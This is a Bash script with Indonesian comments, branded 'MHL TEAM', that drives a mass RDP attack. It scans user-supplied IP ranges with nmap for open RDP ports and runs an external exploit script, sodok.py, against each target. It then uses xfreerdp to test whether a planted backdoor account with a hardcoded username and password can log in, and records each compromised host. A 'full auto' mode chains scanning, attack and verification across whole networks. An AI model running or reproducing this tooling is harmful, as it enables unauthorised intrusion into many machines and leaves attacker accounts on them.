#!/bin/bash

# ===================================================================================
# Skrip Runner untuk sodok.py
# Disesuaikan untuk MHL TEAM.
# Versi dengan perbaikan verbose/progres Nmap.
# ===================================================================================

# Definisi Warna
RED='\033[0;31m'
GREEN='\033[0;32m'
YELLOW='\033[1;33m'
BLUE='\033[0;34m'
CYAN='\033[0;36m'
NC='\033[0m' # No Color

# Nama File Output
TARGET_LIST_FILE="berhasil.txt"
FULL_SCAN_REPORT="scan_lengkap.txt"
SUCCESS_FILE="cok.txt"

# Cek dependensi
check_deps() {
    if ! command -v python3 &> /dev/null; then echo -e "${RED}❌ Error: 'python3' tidak ditemukan.${NC}"; exit 1; fi
    if ! command -v nmap &> /dev/null; then echo -e "${RED}❌ Error: 'nmap' tidak ditemukan.${NC}"; exit 1; fi
    if ! command -v xfreerdp &> /dev/null; then echo -e "${RED}❌ Error: 'xfreerdp' tidak ditemukan. Dibutuhkan untuk verifikasi.${NC}\n${YELLOW}ℹ️  Install: sudo apt install freerdp2-x11 -y${NC}"; exit 1; fi
    if [ ! -f "sodok.py" ]; then echo -e "${RED}❌ Error: File 'sodok.py' tidak ditemukan.${NC}"; exit 1; fi
}

# Fungsi internal untuk menjalankan scan
_internal_scan() {
    local IP_RANGE=$1
    local ports="3389,3390,3391,13389,12345"
    local temp_gnmap_file="temp_scan.gnmap"

    echo -e "\n${YELLOW}📡 Memulai scan canggih pada range ${IP_RANGE}...${NC}"
    echo -e "${YELLOW}   Port yang di-scan: ${ports}${NC}"
    echo -e "${YELLOW}   Ini akan memakan waktu cukup lama, harap bersabar...${NC}"
    echo -e "${BLUE}----------------------[ NMAP OUTPUT ]----------------------${NC}"

    # --- PERBAIKAN DI SINI ---
    # Menghapus '> /dev/null 2>&1' agar progres Nmap dapat terlihat oleh pengguna.
    nmap -p "$ports" --script rdp-ntlm-info -sV -Pn -oN "$FULL_SCAN_REPORT" -oG "$temp_gnmap_file" "$IP_RANGE"

    echo -e "${BLUE}--------------------[ NMAP SELESAI ]---------------------${NC}"

    awk '/\/open\// {ip=$2; for(i=3; i<=NF; i++) if($i ~ /open/) {split($i, p, "/"); print ip":"p[1]}}' "$temp_gnmap_file" > "$TARGET_LIST_FILE"
    rm "$temp_gnmap_file"
}

# Fungsi verifikasi
verify_credentials() {
    local IP=$1; local PORT=$2; local USER="sincan2"; local PASS="koped123"; echo -e "${CYAN}[*] Mencoba memverifikasi kredensial di ${IP}:${PORT}...${NC}"; xfreerdp /v:"${IP}:${PORT}" /u:"${USER}" /p:"${PASS}" +auth-only /cert:ignore /timeout:15000 > /dev/null 2>&1; if [ $? -eq 0 ]; then echo -e "${GREEN}[+] VERIFIKASI BERHASIL! User '${USER}' dapat login.${NC}"; echo "SUCCESS: ${IP}:${PORT} - User: ${USER} Pass: ${PASS}" >> "${SUCCESS_FILE}"; echo -e "${GREEN}[+] Hasil disimpan di ${SUCCESS_FILE}${NC}"; else echo -e "${RED}[-] Verifikasi Gagal. User '${USER}' tidak dapat login atau target tidak merespons.${NC}"; fi
}

# Fungsi serangan dengan mode 'auto' untuk verifikasi
attack_and_verify() {
    local IP=$1
    local PORT=$2
    local MODE=$3

    echo -e "\n${YELLOW}🚀 Memulai serangan ke ${IP}:${PORT}...${NC}"
    python3 sodok.py "$IP" "$PORT"

    echo -e "\n${BLUE}[*] Menunggu 10 detik agar payload sempat dieksekusi di target...${NC}"
    sleep 10

    if [[ "$MODE" == "auto" ]]; then
        verify_credentials "$IP" "$PORT"
    else
        read -p "Coba verifikasi penambahan user sekarang? (y/n): " choice
        if [[ "$choice" == "y" || "$choice" == "Y" ]]; then
            verify_credentials "$IP" "$PORT"
        fi
    fi
}

# Opsi 1: Serang Tunggal
single_attack() {
    echo -e "${CYAN}--- Serang Target Tunggal ---${NC}"; read -p "Masukkan IP Target: " RHOST; read -p "Masukkan Port RDP Target (default: 3389): " RPORT; RPORT=${RPORT:-3389}; if [ -z "$RHOST" ]; then echo -e "${RED}IP Target tidak boleh kosong!${NC}"; sleep 2; return; fi; attack_and_verify "$RHOST" "$RPORT"; echo -e "\n${GREEN}✅ Proses selesai. Tekan [Enter] untuk kembali ke menu.${NC}"; read -r
}

# Opsi 2: Serang Massal
mass_attack() {
    echo -e "${CYAN}--- Serang Massal dari ${TARGET_LIST_FILE} ---${NC}"; if [ ! -s "$TARGET_LIST_FILE" ]; then echo -e "${RED}❌ File ${TARGET_LIST_FILE} kosong atau tidak ada.${NC}"; sleep 3; return; fi; echo -e "${YELLOW}📄 Daftar target yang akan diserang (Format IP:PORT):${NC}"; cat -n "$TARGET_LIST_FILE"; echo ""; total=$(wc -l < "$TARGET_LIST_FILE"); current=1; while IFS= read -r line; do IP=$(echo "$line" | cut -d':' -f1); PORT=$(echo "$line" | cut -d':' -f2); echo -e "${BLUE}--------------------------------------------------${NC}"; attack_and_verify "$IP" "$PORT"; current=$((current + 1)); done < "$TARGET_LIST_FILE"; echo -e "\n${GREEN}✅ Semua target telah diproses.${NC}"; read -p "Apakah Anda ingin menghapus file '$TARGET_LIST_FILE' dan '$FULL_SCAN_REPORT'? (y/n): " confirm; if [[ "$confirm" == "y" || "$confirm" == "Y" ]]; then > "$TARGET_LIST_FILE"; > "$FULL_SCAN_REPORT"; echo -e "${GREEN}File hasil scan telah dihapus.${NC}"; fi; echo -e "Tekan [Enter] untuk kembali ke menu."; read -r
}

# Opsi 3: Scan
scan_rdp() {
    echo -e "${CYAN}--- Scan RDP Canggih ---${NC}"; read -p "Masukkan range IP untuk discan (contoh: 192.168.1.0/24): " IP_RANGE; if [ -z "$IP_RANGE" ]; then echo -e "${RED}Range IP tidak boleh kosong!${NC}"; sleep 2; return; fi; _internal_scan "$IP_RANGE"; echo -e "\n${GREEN}✅ Scan Selesai!${NC}"; echo -e "   - Laporan lengkap dengan detail OS/versi disimpan di: ${CYAN}${FULL_SCAN_REPORT}${NC}"; if [ -s "$TARGET_LIST_FILE" ]; then echo -e "   - Daftar target bersih untuk diserang disimpan di: ${CYAN}${TARGET_LIST_FILE}${NC}"; echo -e "${BLUE}-------------------- TARGET DITEMUKAN (IP:PORT) --------------------${NC}"; cat "$TARGET_LIST_FILE"; echo -e "${BLUE}--------------------------------------------------------------------${NC}"; else echo -e "\n${RED}❌ Tidak ditemukan host dengan port RDP terbuka.${NC}"; fi; echo -e "Tekan [Enter] untuk kembali."; read -r
}

# Opsi 4: Mode Otomatis Penuh
full_auto_mode() {
    echo -e "${CYAN}--- 🔥 Mode Otomatis Penuh: Scan, Serang, Verifikasi 🔥 ---${NC}"; read -p "Masukkan range IP untuk discan (contoh: 192.168.1.0/24): " IP_RANGE; if [ -z "$IP_RANGE" ]; then echo -e "${RED}Range IP tidak boleh kosong!${NC}"; sleep 2; return; fi; _internal_scan "$IP_RANGE"; if [ ! -s "$TARGET_LIST_FILE" ]; then echo -e "\n${RED}❌ Tidak ada target yang ditemukan setelah scan. Proses otomatis berhenti.${NC}"; rm -f "$FULL_SCAN_REPORT"; echo -e "Tekan [Enter] untuk kembali ke menu."; read -r; return; fi; echo -e "\n${GREEN}✅ Scan selesai. Ditemukan $(wc -l < ${TARGET_LIST_FILE}) target. Memulai fase serangan otomatis...${NC}"; while IFS= read -r line; do IP=$(echo "$line" | cut -d':' -f1); PORT=$(echo "$line" | cut -d':' -f2); echo -e "${BLUE}=====================================================================${NC}"; attack_and_verify "$IP" "$PORT" "auto"; done < "$TARGET_LIST_FILE"; echo -e "\n${GREEN}✅ Proses otomatis selesai untuk semua target.${NC}"; echo -e "[*] Menghapus file sementara (${TARGET_LIST_FILE} dan ${FULL_SCAN_REPORT})..."; rm -f "$TARGET_LIST_FILE" "$FULL_SCAN_REPORT"; echo -e "[*] Semua selesai. Periksa file ${CYAN}${SUCCESS_FILE}${NC} untuk melihat daftar target yang berhasil dieksploitasi."; echo -e "Tekan [Enter] untuk kembali ke menu."; read -r
}

# Tampilan Menu Utama
main_menu() {
    clear; echo -e "${YELLOW}"; cat << "BANNER_ART"
|  \      /  \|  \  |  \|  \          |      \|         \ /         \ |  \      /  \
| $$\    /  $$| $$  | $$| $$           \$$$$$$$$| $$$$$$$$|  $$$$$$\| $$\    /  $$
| $$$\  /  $$$| $$__| $$| $$                 | $$  | $$__    | $$__| $$| $$$\  /  $$$
| $$$$\  $$$$| $$    $$| $$                 | $$  | $$  \   | $$    $$| $$$$\  $$$$
| $$\$$ $$ $$| $$$$$$$$| $$                 | $$  | $$$$$   | $$$$$$$$| $$\$$ $$ $$
| $$ \$$$| $$| $$  | $$| $$_____          | $$  | $$_____ | $$  | $$| $$ \$$$| $$
| $$  \$ | $$| $$  | $$| $$      \          | $$  | $$      \| $$  | $$| $$  \$ | $$
 \$$      \$$ \$$   \$$ \$$$$$$$$          \$$   \$$$$$$$$ \$$   \$$ \$$      \$$
BANNER_ART
    echo -e "${NC}"; echo -e "${BLUE}=========================================================================================${NC}"; echo -e "${CYAN}                                  -=[ M H L  T E A M ]=-                                    ${NC}"; echo -e "${BLUE}=========================================================================================${NC}"; printf "| %-85s |\n" ""; printf "|  ${GREEN}%-83s${BLUE}  |\n" "Pilih Opsi:"; printf "| %-85s |\n" ""; printf "|    ${YELLOW}%s)${NC} %s %-78s${BLUE}|\n" "1" "🎯" "Serang Target Tunggal (IP:Port)"; printf "|    ${YELLOW}%s)${NC} %s %-78s${BLUE}|\n" "2" "📋" "Serang Massal (dari ${TARGET_LIST_FILE})"; printf "|    ${YELLOW}%s)${NC} %s %-78s${BLUE}|\n" "3" "🔍" "Scan RDP Canggih & Simpan Hasil"; printf "|    ${RED}%s)${NC} %s %-78s${BLUE}|\n" "4" "🔥" "Scan & Serang Otomatis (Full Auto)"; printf "| %-85s |\n" ""; printf "|    ${RED}%s)${NC} %s %-78s${BLUE}|\n" "0" "🚪" "Keluar"; printf "| %-85s |\n" ""; echo -e "${BLUE}=========================================================================================${NC}"
}

# --- SCRIPT UTAMA ---
check_deps
while true; do
    main_menu
    read -p "Masukkan pilihan Anda [0-4]: " choice
    case $choice in
        1) single_attack ;;
        2) mass_attack ;;
        3) scan_rdp ;;
        4) full_auto_mode ;;
        0) echo -e "\n${CYAN}Terima kasih! 👋${NC}"; exit 0 ;;
        *) echo -e "\n${RED}❌ Pilihan tidak valid!${NC}"; sleep 1 ;;
    esac
done
